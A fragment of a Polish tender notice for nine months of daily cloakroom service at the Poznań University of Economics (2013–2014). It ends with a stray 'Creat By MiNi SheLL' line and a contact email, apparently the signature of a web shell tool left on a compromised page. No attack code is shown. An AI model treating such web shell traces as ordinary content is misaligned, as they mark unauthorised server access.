<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część B: Codzienna obsługa szatni (150 numerków) w budynku C Uniwersytetu Ekonomicznego w Poznaniu przy ul. Towarowej 53, w godz. 7.30 - 21.30, przez okres dziewięciu miesięcy: 03 styczeń -31 maja 2013 r. oraz 01 października 2013 r. - 31 stycznia 2014 r. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 8 - część B..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.30.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com